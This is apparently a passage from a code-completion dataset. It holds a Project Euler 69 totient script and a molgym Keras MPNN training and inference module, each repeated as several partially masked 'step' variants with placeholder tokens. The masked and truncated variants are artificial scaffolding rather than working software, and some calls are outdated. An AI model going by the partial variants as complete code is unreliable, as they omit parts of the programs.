            # Correctness fix: apply the factor to the running count
            # (p -= p // d); the original `p -= int(r/d)` used the partially
            # reduced residue and miscounted, e.g. phi(12) came out as 5.
            p -= p // d
            while r % d == 0:
                r //= d
        d += 1
    if r > 1:
        p -= p // r
    return p


if __name__ == '__main__':
    # Project Euler 69: maximize n / phi(n) over n < 1,000,000.
    # The __main__ guard keeps imports of this module cheap.
    m = (0, 1)
    for n in range(2, 1000000):
        p = phi(n)
        m = max(m, (n / p, n))
        if n % 10000 == 0:
            print(n)  # coarse progress readout

    print(m)
|
flexible
|
{
"blob_id": "e4f97018567559fc2714b75654974fb7c51f770f",
"index": 5266,
"step-1": "<mask token>\n",
"step-2": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\n",
"step-3": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-4": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\nm = 0, 1\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-5": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r/d)\n while r % d == 0:\n r = int(r/d)\n d += 1\n return p\n\nm = (0, 1)\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n/p, n))\n if n % 10000 == 0:\n print(n)\n\nprint(m)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
<|reserved_special_token_0|>
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) ->dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],
axis=0)) for k in mols[0].keys())
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
<|reserved_special_token_0|>
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],
num_epochs: int, atom_types: List[int], bond_types: List[str],
batch_size: int=512, validation_split: float=0.1, random_state: int=1,
learning_rate: float=0.001) ->Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate),
'mean_absolute_error')
smiles, y = zip(*database.items())
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,
y[train_split], batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,
y[~train_split], batch_size=batch_size, shuffle=False)
history = model.fit(train_loader, epochs=num_epochs, validation_data=
val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) ->dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],
axis=0)) for k in mols[0].keys())
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
def evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:
List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:
"""Run inference on a list of molecules
Args:
model_msg: Serialized version of the model
smiles: List of molecules to evaluate
atom_types: List of known atom types
bond_types: List of known bond types
batch_size: List of molecules to create into matches
Returns:
Predicted value for each molecule
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
chunks = [mols[start:start + batch_size] for start in range(0, len(mols
), batch_size)]
batches = [_merge_batch(c) for c in chunks]
outputs = [model.predict_on_batch(b) for b in batches]
return np.vstack(outputs)
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],
num_epochs: int, atom_types: List[int], bond_types: List[str],
batch_size: int=512, validation_split: float=0.1, random_state: int=1,
learning_rate: float=0.001) ->Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate),
'mean_absolute_error')
smiles, y = zip(*database.items())
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,
y[train_split], batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,
y[~train_split], batch_size=batch_size, shuffle=False)
history = model.fit(train_loader, epochs=num_epochs, validation_data=
val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from typing import List, Dict, Tuple
import numpy as np
import tensorflow as tf
from molgym.mpnn.data import convert_nx_to_dict
from molgym.mpnn.layers import custom_objects
from molgym.utils.conversions import convert_smiles_to_nx
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) ->dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],
axis=0)) for k in mols[0].keys())
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
def evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:
List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:
"""Run inference on a list of molecules
Args:
model_msg: Serialized version of the model
smiles: List of molecules to evaluate
atom_types: List of known atom types
bond_types: List of known bond types
batch_size: List of molecules to create into matches
Returns:
Predicted value for each molecule
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
chunks = [mols[start:start + batch_size] for start in range(0, len(mols
), batch_size)]
batches = [_merge_batch(c) for c in chunks]
outputs = [model.predict_on_batch(b) for b in batches]
return np.vstack(outputs)
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],
num_epochs: int, atom_types: List[int], bond_types: List[str],
batch_size: int=512, validation_split: float=0.1, random_state: int=1,
learning_rate: float=0.001) ->Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate),
'mean_absolute_error')
smiles, y = zip(*database.items())
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,
y[train_split], batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,
y[~train_split], batch_size=batch_size, shuffle=False)
history = model.fit(train_loader, epochs=num_epochs, validation_data=
val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
<|reserved_special_token_1|>
"""Functions for updating and performing bulk inference using an Keras MPNN model"""
from typing import List, Dict, Tuple
import numpy as np
import tensorflow as tf
from molgym.mpnn.data import convert_nx_to_dict
from molgym.mpnn.layers import custom_objects
from molgym.utils.conversions import convert_smiles_to_nx
# TODO (wardlt): Make this Keras message object usable elsewhere
class MPNNMessage:
    """Package for sending an MPNN model over pickle

    Keras models are not directly picklable, so this wrapper captures the
    architecture (as a JSON string) and the weights (as NumPy arrays), both
    of which serialize cleanly. Call :meth:`get_model` on the receiving side
    to reconstruct an equivalent model.
    """

    def __init__(self, model: tf.keras.Model):
        """
        Args:
            model: Model to be sent
        """
        # Architecture, serialized to a JSON string
        self.config = model.to_json()
        # Makes a copy of the weights to ensure they are not memoryview objects
        self.weights = [np.array(v) for v in model.get_weights()]

    def get_model(self) -> tf.keras.Model:
        """Rebuild the Keras model from the stored architecture and weights

        Returns:
            Model equivalent to the one passed to the constructor; custom
            layers are resolved through the MPNN library's ``custom_objects``
        """
        model = tf.keras.models.model_from_json(self.config, custom_objects=custom_objects)
        model.set_weights(self.weights)
        return model
def _merge_batch(mols: List[dict]) -> dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
# Convert arrays to array
# Stack the values from each array
batch = dict(
(k, np.concatenate([np.atleast_1d(m[k]) for m in mols], axis=0))
for k in mols[0].keys()
)
# Compute the mappings from bond index to graph index
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
# Compute offsets for the connectivity matrix
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
def evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str],
                  atom_types: List[int], bond_types: List[str], batch_size: int = 128) -> np.ndarray:
    """Run inference on a list of molecules

    Args:
        model_msg: Serialized version of the model
        smiles: List of molecules to evaluate
        atom_types: List of known atom types
        bond_types: List of known bond types
        batch_size: List of molecules to create into matches
    Returns:
        Predicted value for each molecule
    """
    # Rebuild the model in a fresh session
    tf.keras.backend.clear_session()
    model = model_msg.get_model()

    # Convert each SMILES string into the MPNN dictionary format
    # TODO (wardlt): Use multiprocessing. Could benefit from a persistent Pool to avoid loading in TF many times
    graphs = [convert_nx_to_dict(convert_smiles_to_nx(entry), atom_types, bond_types)
              for entry in smiles]

    # Score one merged batch at a time and stack the per-batch predictions
    predictions = []
    for begin in range(0, len(graphs), batch_size):
        merged = _merge_batch(graphs[begin:begin + batch_size])
        predictions.append(model.predict_on_batch(merged))
    return np.vstack(predictions)
# TODO (wardlt): Move to the MPNN library?
class GraphLoader(tf.keras.utils.Sequence):
    """Keras-compatible data loader for training a graph problem"""

    def __init__(self, smiles: List[str], atom_types: List[int], bond_types: List[str],
                 outputs: List[float], batch_size: int, shuffle: bool = True, random_state: int = None):
        """

        Args:
            smiles: List of molecules
            atom_types: List of known atom types
            bond_types: List of known bond types
            outputs: List of molecular outputs
            batch_size: Number of batches to use to train model
            shuffle: Whether to shuffle after each epoch
            random_state: Random state for the shuffling
        """
        super(GraphLoader, self).__init__()

        # Pre-convert every molecule into the MPNN-ready dictionary format
        graphs = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types)
                  for s in smiles]
        self.entries = np.array(list(zip(graphs, outputs)))

        # Batching/shuffling configuration
        self.batch_size = batch_size
        self.shuffle = shuffle

        # Shuffle once up front so the first epoch is already randomized
        self.rng = np.random.RandomState(random_state)
        if shuffle:
            self.rng.shuffle(self.entries)

    def __getitem__(self, item):
        # Slice out the entries that belong to batch number `item`
        begin = item * self.batch_size
        selected = self.entries[begin:begin + self.batch_size]

        # Separate the molecule dictionaries from their target values
        graphs, targets = zip(*selected)
        return _merge_batch(graphs), np.array(targets)

    def __len__(self):
        # Ceiling division: a trailing, partially-filled batch still counts
        return -(-len(self.entries) // self.batch_size)
# TODO (wardlt): Evaluate whether the model stays in memory after training. If so, clear graph?
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float], num_epochs: int,
                atom_types: List[int], bond_types: List[str], batch_size: int = 512,
                validation_split: float = 0.1, random_state: int = 1, learning_rate: float = 1e-3)\
        -> Tuple[List, dict]:
    """Update a model with new training sets

    Args:
        model_msg: Serialized version of the model
        database: Training dataset of molecule mapped to a property
        atom_types: List of known atom types
        bond_types: List of known bond types
        num_epochs: Number of epochs to run
        batch_size: Number of molecules per training batch
        validation_split: Fraction of molecules used for the training/validation split
        random_state: Seed to the random number generator. Ensures entries do not move between train
            and validation set as the database becomes larger
        learning_rate: Learning rate for the Adam optimizer
    Returns:
        model: Updated weights
        history: Training history
    """
    # Rebuild the model
    tf.keras.backend.clear_session()
    model = model_msg.get_model()
    # Fix: use `learning_rate=`; the `lr` keyword is deprecated in TF2 and
    # removed entirely in Keras 3
    model.compile(tf.keras.optimizers.Adam(learning_rate=learning_rate), 'mean_absolute_error')

    # Separate the database into molecules and properties
    smiles, y = zip(*database.items())

    # Make the training and validation splits
    # Use a random number generator with fixed seed to ensure that the validation
    # set is never polluted with entries from the training set
    # TODO (wardlt): Replace with passing train and validation separately?
    rng = np.random.RandomState(random_state)
    train_split = rng.rand(len(smiles)) > validation_split

    # Make the loaders
    smiles = np.array(smiles)
    y = np.array(y)
    train_loader = GraphLoader(smiles[train_split], atom_types, bond_types, y[train_split],
                               batch_size=batch_size)
    val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types, y[~train_split],
                             batch_size=batch_size, shuffle=False)

    # Run the desired number of epochs
    # TODO (wardlt): Should we use callbacks to get only the "best model" based on the validation set?
    history = model.fit(train_loader, epochs=num_epochs, validation_data=val_loader, verbose=False)
    return [np.array(v) for v in model.get_weights()], history.history
|
flexible
|
{
"blob_id": "95ab8fce573ef959946d50d9af6e893cb8798917",
"index": 6714,
"step-1": "<mask token>\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\n<mask token>\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) ->dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],\n axis=0)) for k in mols[0].keys())\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n return batch\n\n\n<mask token>\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n 
bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],\n num_epochs: int, atom_types: List[int], bond_types: List[str],\n batch_size: int=512, validation_split: float=0.1, random_state: int=1,\n learning_rate: float=0.001) ->Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. 
Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate),\n 'mean_absolute_error')\n smiles, y = zip(*database.items())\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,\n y[train_split], batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,\n y[~train_split], batch_size=batch_size, shuffle=False)\n history = model.fit(train_loader, epochs=num_epochs, validation_data=\n val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-3": "<mask token>\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) ->dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],\n axis=0)) for k in mols[0].keys())\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n return batch\n\n\ndef evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:\n List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:\n \"\"\"Run inference on a list of molecules\n\n Args:\n model_msg: Serialized version of the model\n smiles: List of molecules to evaluate\n atom_types: List of known atom types\n bond_types: List of known bond types\n batch_size: List of molecules to create into matches\n Returns:\n Predicted value for each molecule\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n chunks = [mols[start:start + batch_size] for start in range(0, len(mols\n ), batch_size)]\n batches 
= [_merge_batch(c) for c in chunks]\n outputs = [model.predict_on_batch(b) for b in batches]\n return np.vstack(outputs)\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n 